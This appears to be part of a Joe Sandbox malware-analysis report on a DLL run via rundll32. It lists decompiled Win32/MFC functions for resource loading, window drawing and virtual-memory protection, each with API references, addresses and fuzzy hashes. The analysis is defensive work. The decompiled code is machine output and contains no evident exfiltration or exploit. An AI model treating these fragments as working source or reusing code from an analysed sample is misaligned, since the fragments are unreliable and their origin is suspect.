									__eflags = _t107;
									if(_t107 == 0) {
										_t107 = 0;
										__eflags = 0;
									} else {
										_t72 =  *((intOrPtr*)(_t103 + 0xc)) + _v20;
										_t73 = GetDlgItem( *(_t86 + 0x1c),  *_t72);
										 *(_t107 + 4) =  *(_t107 + 4) & 0x00000000;
										 *(_t107 + 8) = _t72[1];
										_t103 = _a12;
										 *_t107 = _t73;
									}
									_t93 =  *(_t86 + 0x48) + 0x3c;
									__eflags = _v12;
									_push(_t107);
									if(__eflags == 0) {
										E1001E118(_t93, __eflags);
									} else {
										_push(_v12);
										E1001DF55(_t93);
									}
								}
								goto L24;
							}
							_t95 =  *((intOrPtr*)(_t89 + 4));
							_t101 =  *((intOrPtr*)(_t103 + 0xc));
							__eflags =  *((intOrPtr*)(_t95 + 0x28)) -  *((intOrPtr*)(_t101 + _t61 * 8));
							if( *((intOrPtr*)(_t95 + 0x28)) !=  *((intOrPtr*)(_t101 + _t61 * 8))) {
								goto L17;
							} else {
								_t64 = _a4;
								__eflags = _t64;
								_v12 = _t64;
								if(_t64 == 0) {
									_a8 = _a8 & 0x00000000;
								} else {
									_a8 =  *(E10006D96( &_a4));
								}
							}
							L24:
							_t61 = _v8 + 1;
							__eflags = _t61 -  *(_t103 + 8);
							_v8 = _t61;
						} while (_t61 <  *(_t103 + 8));
					}
					goto L25;
				}
			}



























                                                                                                            0x100071cd
                                                                                                            0x100071cf
                                                                                                            0x100071d2
                                                                                                            0x100071d5
                                                                                                            0x100071dc
                                                                                                            0x100071e8
                                                                                                            0x100071f0
                                                                                                            0x100071f4
                                                                                                            0x100071fc
                                                                                                            0x100071ff
                                                                                                            0x00000000
                                                                                                            0x10007201
                                                                                                            0x1000720f
                                                                                                            0x1000720f
                                                                                                            0x100071f0
                                                                                                            0x10007212
                                                                                                            0x10007215
                                                                                                            0x10007218
                                                                                                            0x1000721b
                                                                                                            0x10007222
                                                                                                            0x1000722d
                                                                                                            0x10007230
                                                                                                            0x10007234
                                                                                                            0x10007237
                                                                                                            0x1000723c
                                                                                                            0x1000723c
                                                                                                            0x10007237
                                                                                                            0x10007242
                                                                                                            0x10007245
                                                                                                            0x10007247
                                                                                                            0x10007328
                                                                                                            0x00000000
                                                                                                            0x1000724d
                                                                                                            0x1000724d
                                                                                                            0x10007250
                                                                                                            0x10007254
                                                                                                            0x10007256
                                                                                                            0x10007259
                                                                                                            0x1000725c
                                                                                                            0x1000726c
                                                                                                            0x1000726c
                                                                                                            0x1000726f
                                                                                                            0x10007271
                                                                                                            0x10007274
                                                                                                            0x10007277
                                                                                                            0x1000727d
                                                                                                            0x1000727d
                                                                                                            0x10007280
                                                                                                            0x10007282
                                                                                                            0x100072b8
                                                                                                            0x100072b8
                                                                                                            0x100072bb
                                                                                                            0x100072be
                                                                                                            0x100072c2
                                                                                                            0x100072c5
                                                                                                            0x100072ce
                                                                                                            0x100072d0
                                                                                                            0x100072d3
                                                                                                            0x100072fa
                                                                                                            0x100072fa
                                                                                                            0x100072d5
                                                                                                            0x100072de
                                                                                                            0x100072e6
                                                                                                            0x100072ec
                                                                                                            0x100072f0
                                                                                                            0x100072f3
                                                                                                            0x100072f6
                                                                                                            0x100072f6
                                                                                                            0x100072ff
                                                                                                            0x10007302
                                                                                                            0x10007306
                                                                                                            0x10007307
                                                                                                            0x10007313
                                                                                                            0x10007309
                                                                                                            0x10007309
                                                                                                            0x1000730c
                                                                                                            0x1000730c
                                                                                                            0x10007307
                                                                                                            0x00000000
                                                                                                            0x100072c5
                                                                                                            0x10007284
                                                                                                            0x10007287
                                                                                                            0x1000728d
                                                                                                            0x10007290
                                                                                                            0x00000000
                                                                                                            0x10007292
                                                                                                            0x10007292
                                                                                                            0x10007295
                                                                                                            0x10007297
                                                                                                            0x1000729a
                                                                                                            0x100072b2
                                                                                                            0x1000729c
                                                                                                            0x100072ad
                                                                                                            0x100072ad
                                                                                                            0x1000729a
                                                                                                            0x10007318
                                                                                                            0x1000731b
                                                                                                            0x1000731c
                                                                                                            0x1000731f
                                                                                                            0x1000731f
                                                                                                            0x1000727d
                                                                                                            0x00000000
                                                                                                            0x10007277

                                                                                                            APIs
                                                                                                            • FindResourceA.KERNEL32(?,?,000000F0), ref: 100071E8
                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 100071F4
                                                                                                            • LockResource.KERNEL32(00000000), ref: 10007209
                                                                                                            • FreeResource.KERNEL32(00000000), ref: 1000723C
                                                                                                            • GetDlgItem.USER32 ref: 100072E6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Resource$FindFreeItemLoadLock
                                                                                                            • String ID:
                                                                                                            • API String ID: 996205394-0
                                                                                                            • Opcode ID: a2403dcbaf47a98d0818dc6bf856e1e017887b1b7f9ace347811d0ac3dce61fc
                                                                                                            • Instruction ID: 3ddb78cc740fa9bd2d00af88598f625c67c34797d15b04e165b588e19e6e1fdb
                                                                                                            • Opcode Fuzzy Hash: a2403dcbaf47a98d0818dc6bf856e1e017887b1b7f9ace347811d0ac3dce61fc
                                                                                                            • Instruction Fuzzy Hash: 37516B35A00209EFEB14CFA5C884A9EBBF5FF44390F508469E80A9B255D734EA41DF90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10009B77 Relevance: 7.6, APIs: 5, Instructions: 126windowthreadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 88%
                                                                                                            			E10009B77(void* __ebx, void* __ecx) {
				void* _t62;
				long _t63;
				void* _t76;

				E10011BF0(0x1003ae2b, _t76);
				_t62 =  *((intOrPtr*)(_t76 + 0xc)) + 0x2cc;
				if(_t62 > 0xf) {
					L20:
					_t63 = 0;
				} else {
					switch( *((intOrPtr*)(( *(_t62 + 0x10009d63) & 0x000000ff) * 4 +  &M10009D3B))) {
						case 0:
							__eax =  *(__ebp + 0x10);
							 *__eax = 2;
							 *(__eax + 8) = 1;
							goto L19;
						case 1:
							_t65 =  *((intOrPtr*)(_t76 + 0x10));
							 *(_t65 + 8) =  *(_t65 + 8) | 0x0000ffff;
							 *_t65 = 0xb;
							goto L19;
						case 2:
							__esi =  *(__ebp + 0x10);
							__ecx =  *(__ebp + 8);
							 *__esi = 0xb;
							E1000A369( *(__ebp + 8)) =  ~__eax;
							asm("sbb eax, eax");
							 *(__esi + 8) = __ax;
							goto L19;
						case 3:
							__eax =  *(__ebp + 0x10);
							 *(__eax + 8) =  *(__eax + 8) & 0x00000000;
							 *__eax = 0xb;
							goto L19;
						case 4:
							__eax = E100243B2();
							__edx =  *__eax;
							__ecx = __eax;
							__eax =  *((intOrPtr*)( *__eax + 0xc))();
							 *(__ebp + 0xc) = __eax;
							__ecx = __ebp + 0xc;
							 *(__ebp - 4) = 1;
							__eax = E10006A60(__ebp + 0xc, 0xf1c0);
							__esi =  *(__ebp + 0x10);
							__ecx = __ebp + 0xc;
							 *__esi = 8;
							__eax = E10035C0F(__ebx, __ebp + 0xc, __edi, __esi, __ebp);
							__ecx =  *(__ebp + 0xc);
							 *(__esi + 8) = __eax;
							__ecx =  *(__ebp + 0xc) + 0xfffffff0;
							__eflags = __ecx;
							goto L18;
						case 5:
							__esi =  *(__ebp + 0x10);
							 *__esi = 3;
							 *(__esi + 8) = GetThreadLocale();
							goto L19;
						case 6:
							__eflags =  *(__esi + 0x58) - 0xffffffff;
							if( *(__esi + 0x58) == 0xffffffff) {
								_push( *(__esi + 0x1c));
								__ecx = __ebp - 0x20;
								E10029194(__ebp - 0x20) =  *(__esi + 0x1c);
								 *( *(__esi + 0x1c) + 0x1c) = SendMessageA( *( *(__esi + 0x1c) + 0x1c), 0x138,  *(__ebp - 0x1c),  *( *(__esi + 0x1c) + 0x1c));
								 *(__esi + 0x58) = GetBkColor( *(__ebp - 0x18));
								__eax = GetTextColor( *(__ebp - 0x18));
								__ecx = __ebp - 0x20;
								 *(__esi + 0x5c) = __eax;
								__eax = E100291EF(__ebp - 0x20, __eflags);
							}
							__eflags = __edi - 0xfffffd43;
							__eax =  *(__ebp + 0x10);
							 *__eax = 3;
							if(__edi != 0xfffffd43) {
								__esi =  *(__esi + 0x5c);
							} else {
								__esi =  *(__esi + 0x58);
							}
							 *(__eax + 8) = __esi;
							goto L19;
						case 7:
							__eflags =  *(__esi + 0x60);
							if( *(__esi + 0x60) != 0) {
								L13:
								__edi =  *(__ebp + 0x10);
								 *__edi = 9;
								__eax =  *(__esi + 0x60);
								__ecx =  *__eax;
								_push(__eax);
								__eax =  *(__esi + 0x60);
								 *(__edi + 8) =  *(__esi + 0x60);
								goto L19;
							} else {
								__ecx =  *(__esi + 0x1c);
								__eax = E100090C8( *(__esi + 0x1c));
								__ecx = __esi;
								__eax = E1000943B(__esi, __eax);
								__eflags =  *(__esi + 0x60);
								if( *(__esi + 0x60) == 0) {
									goto L20;
								} else {
									goto L13;
								}
							}
							goto L21;
						case 8:
							__eax = E100243B2();
							__edx =  *__eax;
							__ecx = __eax;
							_t43 = __eax + 0x10; // 0x10
							__esi = _t43;
							 *(__ebp + 0xc) = __esi;
							__edi =  *(__ebp + 0x10);
							 *(__ebp - 4) =  *(__ebp - 4) & 0x00000000;
							__ecx = __ebp + 0xc;
							 *__edi = 8;
							 *(__edi + 8) = E10035C0F(__ebx, __ebp + 0xc, __edi, __esi, __ebp);
							_t50 = __esi - 0x10; // 0x0
							__ecx = _t50;
							L18:
							__eax = E100014B0(__ecx, __edx);
							L19:
							_t63 = 1;
							goto L21;
						case 9:
							goto L20;
					}
				}
				L21:
				 *[fs:0x0] =  *((intOrPtr*)(_t76 - 0xc));
				return _t63;
			}






                                                                                                            0x10009b7c
                                                                                                            0x10009b89
                                                                                                            0x10009b94
                                                                                                            0x10009d29
                                                                                                            0x10009d29
                                                                                                            0x10009b9a
                                                                                                            0x10009ba1
                                                                                                            0x00000000
                                                                                                            0x10009bcc
                                                                                                            0x10009bcf
                                                                                                            0x10009bd4
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10009ba8
                                                                                                            0x10009bab
                                                                                                            0x10009bb0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10009c82
                                                                                                            0x10009c85
                                                                                                            0x10009c88
                                                                                                            0x10009c92
                                                                                                            0x10009c94
                                                                                                            0x10009c96
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10009bba
                                                                                                            0x10009bbd
                                                                                                            0x10009bc2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10009ce0
                                                                                                            0x10009ce5
                                                                                                            0x10009ce7
                                                                                                            0x10009ce9
                                                                                                            0x10009cef
                                                                                                            0x10009cf7
                                                                                                            0x10009cfa
                                                                                                            0x10009d01
                                                                                                            0x10009d06
                                                                                                            0x10009d09
                                                                                                            0x10009d0c
                                                                                                            0x10009d11
                                                                                                            0x10009d16
                                                                                                            0x10009d19
                                                                                                            0x10009d1c
                                                                                                            0x10009d1c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10009c9f
                                                                                                            0x10009ca2
                                                                                                            0x10009cad
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10009bdf
                                                                                                            0x10009be3
                                                                                                            0x10009be5
                                                                                                            0x10009be8
                                                                                                            0x10009bf0
                                                                                                            0x10009c00
                                                                                                            0x10009c12
                                                                                                            0x10009c15
                                                                                                            0x10009c1b
                                                                                                            0x10009c1e
                                                                                                            0x10009c21
                                                                                                            0x10009c21
                                                                                                            0x10009c26
                                                                                                            0x10009c2c
                                                                                                            0x10009c2f
                                                                                                            0x10009c34
                                                                                                            0x10009c3b
                                                                                                            0x10009c36
                                                                                                            0x10009c36
                                                                                                            0x10009c36
                                                                                                            0x10009c3e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10009c46
                                                                                                            0x10009c4a
                                                                                                            0x10009c66
                                                                                                            0x10009c66
                                                                                                            0x10009c69
                                                                                                            0x10009c6e
                                                                                                            0x10009c71
                                                                                                            0x10009c73
                                                                                                            0x10009c77
                                                                                                            0x10009c7a
                                                                                                            0x00000000
                                                                                                            0x10009c4c
                                                                                                            0x10009c4c
                                                                                                            0x10009c4f
                                                                                                            0x10009c55
                                                                                                            0x10009c57
                                                                                                            0x10009c5c
                                                                                                            0x10009c60
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10009c60
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10009cb2
                                                                                                            0x10009cb7
                                                                                                            0x10009cb9
                                                                                                            0x10009cbe
                                                                                                            0x10009cbe
                                                                                                            0x10009cc1
                                                                                                            0x10009cc4
                                                                                                            0x10009cc7
                                                                                                            0x10009ccb
                                                                                                            0x10009cce
                                                                                                            0x10009cd8
                                                                                                            0x10009cdb
                                                                                                            0x10009cdb
                                                                                                            0x10009d1f
                                                                                                            0x10009d1f
                                                                                                            0x10009d24
                                                                                                            0x10009d26
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10009ba1
                                                                                                            0x10009d2b
                                                                                                            0x10009d30
                                                                                                            0x10009d38

                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 10009B7C
                                                                                                            • SendMessageA.USER32(?,00000138,?,?), ref: 10009C00
                                                                                                            • GetBkColor.GDI32(?), ref: 10009C09
                                                                                                            • GetTextColor.GDI32(?), ref: 10009C15
                                                                                                            • GetThreadLocale.KERNEL32(0000F1C0), ref: 10009CA7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Color$H_prologLocaleMessageSendTextThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 741590120-0
                                                                                                            • Opcode ID: ffd68efac94681e02b946185b7585b592d7a198cf77f0b1454b8da5265c6291b
                                                                                                            • Instruction ID: 17d43df59e13e7a0fc638ef54e749073bd167348119b36b57266e85b12fc2c17
                                                                                                            • Opcode Fuzzy Hash: ffd68efac94681e02b946185b7585b592d7a198cf77f0b1454b8da5265c6291b
                                                                                                            • Instruction Fuzzy Hash: D451543590074ADFEB20DF64C88499EB7F0FF08354F21895AE8569B3A1E774A981CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100344F5 Relevance: 7.6, APIs: 5, Instructions: 99keyboardCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E100344F5(void* __ecx, intOrPtr _a8) {
				signed int _v7;
				intOrPtr _v8;
				struct tagRECT _v24;
				void* _t44;
				void* _t48;
				void* _t52;
				void* _t57;
				void* _t64;
				signed int _t67;
				void* _t75;
				void* _t76;
				signed int _t78;

				_t75 = __ecx;
				_v8 = E100202AB(__ecx);
				GetWindowRect( *(__ecx + 0x1c),  &_v24);
				_t67 = GetSystemMetrics(0x21);
				_t78 = GetSystemMetrics(0x20);
				_t76 = E1002204B(_t75);
				if((_v7 & 0x00000010) == 0) {
					L5:
					if(_t76 < 0xa || _t76 > 0x11) {
						if(_t76 != 4) {
							goto L16;
						}
						goto L8;
					} else {
						L8:
						if((_v7 & 0x00000008) == 0) {
							InflateRect( &_v24,  ~_t78,  ~_t67);
							if((_v7 & 0x00000002) == 0) {
								L16:
								return _t76;
							}
							_t44 = _t76 - 4;
							if(_t44 == 0) {
								L21:
								return 0xb + (0 | _a8 - _v24.bottom > 0x00000000) * 4;
							}
							_t48 = _t44 - 9;
							if(_t48 == 0) {
								return (0 | _a8 - _v24.top < 0x00000000) + (0 | _a8 - _v24.top < 0x00000000) + 0xa;
							}
							_t52 = _t48 - 1;
							if(_t52 == 0) {
								return (0 | _a8 - _v24.top < 0x00000000) + 0xb;
							}
							_t57 = _t52;
							if(_t57 == 0) {
								return ((0 | _a8 - _v24.bottom <= 0x00000000) - 0x00000001 & 0x00000005) + 0xa;
							}
							if(_t57 == 1) {
								goto L21;
							}
							goto L16;
						}
						_t64 = 2;
						return _t64;
					}
				}
				if(_t76 == 3) {
					_t76 = 2;
				}
				if(GetKeyState(2) >= 0) {
					goto L5;
				} else {
					return 0;
				}
			}















                                                                                                            0x100344fe
                                                                                                            0x10034505
                                                                                                            0x1003450f
                                                                                                            0x10034521
                                                                                                            0x10034527
                                                                                                            0x10034532
                                                                                                            0x10034534
                                                                                                            0x1003454f
                                                                                                            0x10034552
                                                                                                            0x1003455c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1003455e
                                                                                                            0x1003455e
                                                                                                            0x10034562
                                                                                                            0x10034573
                                                                                                            0x1003457d
                                                                                                            0x10034595
                                                                                                            0x00000000
                                                                                                            0x10034595
                                                                                                            0x10034581
                                                                                                            0x10034584
                                                                                                            0x100345d3
                                                                                                            0x00000000
                                                                                                            0x100345de
                                                                                                            0x10034586
                                                                                                            0x10034589
                                                                                                            0x00000000
                                                                                                            0x100345cd
                                                                                                            0x1003458b
                                                                                                            0x1003458c
                                                                                                            0x00000000
                                                                                                            0x100345bd
                                                                                                            0x1003458f
                                                                                                            0x10034590
                                                                                                            0x00000000
                                                                                                            0x100345ad
                                                                                                            0x10034593
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10034593
                                                                                                            0x10034566
                                                                                                            0x00000000
                                                                                                            0x10034566
                                                                                                            0x10034552
                                                                                                            0x10034539
                                                                                                            0x1003453d
                                                                                                            0x1003453d
                                                                                                            0x10034549
                                                                                                            0x00000000
                                                                                                            0x1003454b
                                                                                                            0x00000000
                                                                                                            0x1003454b

                                                                                                            APIs
                                                                                                              • Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6
                                                                                                            • GetWindowRect.USER32 ref: 1003450F
                                                                                                            • GetSystemMetrics.USER32 ref: 1003451D
                                                                                                            • GetSystemMetrics.USER32 ref: 10034523
                                                                                                            • GetKeyState.USER32(00000002), ref: 10034540
                                                                                                            • InflateRect.USER32(?,00000000,00000000), ref: 10034573
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MetricsRectSystemWindow$InflateLongState
                                                                                                            • String ID:
                                                                                                            • API String ID: 2406722796-0
                                                                                                            • Opcode ID: ca75ff146dd13cf3a9a81e35c2b644f3561e541cec42ef1ad0753529e650aa81
                                                                                                            • Instruction ID: eebfe8686990ea06ae8873f0c24ea56f3203d68343432915ce32c001f6d4e862
                                                                                                            • Opcode Fuzzy Hash: ca75ff146dd13cf3a9a81e35c2b644f3561e541cec42ef1ad0753529e650aa81
                                                                                                            • Instruction Fuzzy Hash: 2A31D63AE0051DEFDB12DBA8C888EAE7BA5EF49291F464416D802DF193CE34F940C650
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10010839 Relevance: 7.6, APIs: 5, Instructions: 92memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 86%
                                                                                                            			E10010839(void* __ecx, void* __eflags) {
				void* _v8;
				long _v12;
				long _v16;
				signed char _v23;
				struct _MEMORY_BASIC_INFORMATION _v44;
				struct _SYSTEM_INFO _v80;
				void* _v92;
				void* _t29;
				int _t33;
				intOrPtr _t35;
				void* _t43;
				void* _t46;
				signed int _t49;
				void* _t54;
				void* _t55;
				void* _t62;
				void* _t63;

				_t29 = 4;
				E10010B20(_t29, __ecx);
				_t55 = _t63;
				if(VirtualQuery(_t55,  &_v44, 0x1c) == 0) {
					L9:
					_t33 = 0;
				} else {
					_t46 = _v44.AllocationBase;
					GetSystemInfo( &_v80);
					_t49 = _v80.dwPageSize;
					_t35 =  *0x1004f3e0; // 0x2
					_t54 = ( !(_t49 - 1) & _t55) - _t49;
					asm("sbb esi, esi");
					_t62 = (( ~(_t35 - 1) & 0xfffffff1) + 0x11) * _t49 + _t46;
					_v12 = _t49;
					if(_t54 < _t62) {
						goto L9;
					} else {
						if(_t35 == 1) {
							_v8 = _t54;
							goto L14;
						} else {
							_v8 = _t46;
							while(VirtualQuery(_v8,  &_v44, 0x1c) != 0) {
								_v8 = _v8 + _v44.RegionSize;
								if((_v44.State & 0x00001000) == 0) {
									continue;
								} else {
									_t43 = _v44.BaseAddress;
									_v8 = _t43;
									if((_v23 & 0x00000001) == 0) {
										if(_t54 >= _t43) {
											if(_t43 < _t62) {
												_v8 = _t62;
											}
											VirtualAlloc(_v8, _v12, 0x1000, 4);
											_t35 =  *0x1004f3e0; // 0x2
											L14:
											asm("sbb eax, eax");
											_t33 = VirtualProtect(_v8, _v12, ( ~(_t35 - 1) & 0x00000103) + 1,  &_v16);
										} else {
											goto L9;
										}
									} else {
										_t33 = 1;
									}
								}
								goto L15;
							}
							goto L9;
						}
					}
				}
				L15:
				return _t33;
			}




















                                                                                                            0x10010844
                                                                                                            0x10010845
                                                                                                            0x1001084a
                                                                                                            0x1001085b
                                                                                                            0x100108d4
                                                                                                            0x100108d4
                                                                                                            0x1001085d
                                                                                                            0x1001085d
                                                                                                            0x10010864
                                                                                                            0x1001086a
                                                                                                            0x1001086d
                                                                                                            0x10010879
                                                                                                            0x10010880
                                                                                                            0x1001088b
                                                                                                            0x1001088f
                                                                                                            0x10010892
                                                                                                            0x00000000
                                                                                                            0x10010894
                                                                                                            0x10010897
                                                                                                            0x100108f5
                                                                                                            0x00000000
                                                                                                            0x10010899
                                                                                                            0x10010899
                                                                                                            0x100108a1
                                                                                                            0x100108b7
                                                                                                            0x100108bd
                                                                                                            0x00000000
                                                                                                            0x100108bf
                                                                                                            0x100108c3
                                                                                                            0x100108c6
                                                                                                            0x100108c9
                                                                                                            0x100108d2
                                                                                                            0x100108da
                                                                                                            0x100108dc
                                                                                                            0x100108dc
                                                                                                            0x100108e8
                                                                                                            0x100108ee
                                                                                                            0x100108f8
                                                                                                            0x100108fb
                                                                                                            0x1001090e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100108cb
                                                                                                            0x100108cd
                                                                                                            0x100108cd
                                                                                                            0x100108c9
                                                                                                            0x00000000
                                                                                                            0x100108bd
                                                                                                            0x00000000
                                                                                                            0x100108a1
                                                                                                            0x10010897
                                                                                                            0x10010892
                                                                                                            0x10010914
                                                                                                            0x1001091b

                                                                                                            APIs
                                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 10010853
                                                                                                            • GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 10010864
                                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 100108AA
                                                                                                            • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0000001C), ref: 100108E8
                                                                                                            • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,0000001C), ref: 1001090E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Virtual$Query$AllocInfoProtectSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 4136887677-0
                                                                                                            • Opcode ID: 71a51d1d86ecf8343d385652834c01b8084f8671a74ced250a72b247972f9a76
                                                                                                            • Instruction ID: ea62dba494344a01c7efc91e140871f3e8746f8623a2ca282db0dc9e1cf87e08
                                                                                                            • Opcode Fuzzy Hash: 71a51d1d86ecf8343d385652834c01b8084f8671a74ced250a72b247972f9a76
                                                                                                            • Instruction Fuzzy Hash: 60316D32E0425DEBEF10CBA8CD85AED7BB8EB05355F110165F981EB191DBB09A809B90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10022C99 Relevance: 7.6, APIs: 5, Instructions: 91windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 95%
                                                                                                            			E10022C99(void* __ebx, intOrPtr __ecx, void* __eflags) {
				void* _t31;
				signed int _t42;
				struct HWND__* _t62;
				void* _t64;
				void* _t69;

				_t69 = __eflags;
				E10011BF0(0x1003a5dc, _t64);
				 *((intOrPtr*)(_t64 - 0x10)) = __ecx;
				E1001FFB4(_t64 - 0x38);
				E10021613(_t64 - 0x88, _t69);
				 *(_t64 - 4) = 0;
				_t62 = GetTopWindow( *(__ecx + 0x1c));
				if(_t62 != 0) {
					do {
						 *(_t64 - 0x6c) = _t62;
						 *(_t64 - 0x34) = GetDlgCtrlID(_t62) & 0x0000ffff;
						_push(_t62);
						 *((intOrPtr*)(_t64 - 0x24)) = _t64 - 0x88;
						if(E10022115() == 0 || E1001FE3C(_t35, 0, 0xbd11ffff, _t64 - 0x38, 0) == 0) {
							if(E1001FE3C( *((intOrPtr*)(_t64 - 0x10)),  *(_t64 - 0x34), 0xffffffff, _t64 - 0x38, 0) == 0) {
								_t46 =  *((intOrPtr*)(_t64 + 0xc));
								if( *((intOrPtr*)(_t64 + 0xc)) != 0) {
									if((SendMessageA( *(_t64 - 0x6c), 0x87, 0, 0) & 0x00000020) == 0) {
										L11:
										_t46 = 0;
									} else {
										_t42 = E100202AB(_t64 - 0x88) & 0x0000000f;
										if(_t42 == 3 || _t42 == 6 || _t42 == 7 || _t42 == 9) {
											goto L11;
										}
									}
								}
								E1001FFDA(_t64 - 0x38,  *((intOrPtr*)(_t64 + 8)), _t46);
							}
						}
						_t62 = GetWindow(_t62, 2);
					} while (_t62 != 0);
				}
				 *(_t64 - 4) =  *(_t64 - 4) | 0xffffffff;
				 *(_t64 - 0x6c) = 0;
				_t31 = E10022977(_t64 - 0x88);
				 *[fs:0x0] =  *((intOrPtr*)(_t64 - 0xc));
				return _t31;
			}








                                                                                                            0x10022c99
                                                                                                            0x10022c9e
                                                                                                            0x10022cad
                                                                                                            0x10022cb0
                                                                                                            0x10022cbb
                                                                                                            0x10022cc5
                                                                                                            0x10022cce
                                                                                                            0x10022cd2
                                                                                                            0x10022cd9
                                                                                                            0x10022cda
                                                                                                            0x10022ce6
                                                                                                            0x10022cef
                                                                                                            0x10022cf0
                                                                                                            0x10022cfa
                                                                                                            0x10022d26
                                                                                                            0x10022d28
                                                                                                            0x10022d2d
                                                                                                            0x10022d42
                                                                                                            0x10022d66
                                                                                                            0x10022d66
                                                                                                            0x10022d44
                                                                                                            0x10022d4f
                                                                                                            0x10022d55
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10022d55
                                                                                                            0x10022d42
                                                                                                            0x10022d6f
                                                                                                            0x10022d6f
                                                                                                            0x10022d26
                                                                                                            0x10022d7d
                                                                                                            0x10022d7f
                                                                                                            0x10022d87
